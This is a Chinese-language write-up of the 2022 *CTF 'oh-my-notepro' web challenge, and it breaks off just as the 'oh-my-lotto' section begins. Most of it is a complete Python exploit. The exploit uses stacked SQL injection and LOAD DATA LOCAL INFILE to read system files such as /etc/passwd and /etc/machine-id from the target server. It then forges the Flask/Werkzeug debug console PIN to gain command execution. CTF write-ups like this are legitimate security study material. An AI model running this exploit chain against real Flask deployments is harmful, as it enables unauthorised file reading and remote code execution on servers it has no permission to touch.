2022-starCTF

前言

跟着EDI打了，但是感觉环境挺坑的–

oh-my-notepro

账号密码弱口令登录，然后，通过create 一个note 可以查询，发现

http://123.60.72.85:5002/view?note_id=p1ee659ofrlcro12mm3kp9ey5hwg464d

报错存在flask的debug报错页面，存在sql的堆叠注入

因为是python的语言，比较有限，因此现在的思路就是读取文件伪造一下pin码：

exp如下：

import random
import requests
import string
import re
import hashlib
from itertools import chain
def pin_mes():
    s=requests.session()
    url="http://121.37.153.47:5002/view?note_id="
    session="session=eyJjc3JmX3Rva2VuIjoiZWJiZmZjNDFlNGQ5YzQxODFjMDZhYTBjNWZjZjIyZDg2NzAzMTZkMyIsInVzZXJuYW1lIjoiYSJ9.YlpPdw.4WCCNhQrbYsuRjp00IeRuAtJZ7U"
    headers={
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Cookie": session,
        "Upgrade-Insecure-Requests": "1"
    }
# 1.username，用户名
# 2. uuidnode，当前网络的mac地址的十进制数
# 3. machine_id，docker机器id
#docker靶机由后面三个合并：1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    pin_me=['/etc/passwd','/sys/class/net/eth0/address','/etc/machine-id','/proc/self/cgroup']
    mess=[]
    find_data=re.compile(r"""
    <h1 style=\"text-align: center\">
        (.*?)
    </h1>
    """)
    for i in pin_me:
        ran_str = ''.join(random.sample(string.ascii_letters + string.digits, 7))
        payload=f"1';CREATE TABLE {ran_str} (go TEXT)%23"
        s.get(url+payload,headers=headers)
        payload2=f"1';load data local infile \"{i}\" into table {ran_str}%23"
        s.get(url + payload2,headers=headers)
        payload3=f"1'union select 1,2,3,4,group_concat(go) from {ran_str}%23"
        r=s.get(url + payload3,headers=headers).text
        #print(r)
        data=re.findall(find_data,r)
        mess.append(data)
    return mess

def get_pypin(gd,ma,cg):
    probably_public_bits = [
        'ctf',  # username
        'flask.app',  # modname
        'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
        '/usr/local/lib/python3.8/site-packages/flask/app.py'  # getattr(mod, '__file__', None),
    ]

    private_bits = [
        f'{gd}',  # str(uuid.getnode()),  /sys/class/net/ens33/address
        # e86c4117-eed3-4a37-82bc-b5fa47a88e0b eabeaffb4e97696bfb087df1717743237ff21f537c0f36676dd49ae6c6065d7e
        f'{ma+cg}'
        # get_machine_id(), /etc/machine-id
    ]

    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')

    cookie_name = '__wzd' + h.hexdigest()[:20]

    num = None
    if num is None:
        h.update(b'pinsalt')
        num = ('%09d' % int(h.hexdigest(), 16))[:9]

    rv = None
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                              for x in range(0, len(num), group_size))
                break
        else:
            rv = num

    print(rv)

if __name__=="__main__":
    pin_data=pin_mes()
    print(pin_data[1])
    gd = int("".join("".join(pin_data[1]).split(":")),16)
    ma=str("".join(pin_data[2]))
    cg = re.findall(r"docker/(.*?),", str(pin_data[3]))[0]
    get_pypin(gd,ma,cg)

拿到pin码以后就可以执行命令

然后比较奇怪的地方就是，有的时候console页面会显示not found，这里出题人给出的意见是

清除缓存即可。

oh-my-lotto

拿到flag的条件是让forecast==lotto_result，因此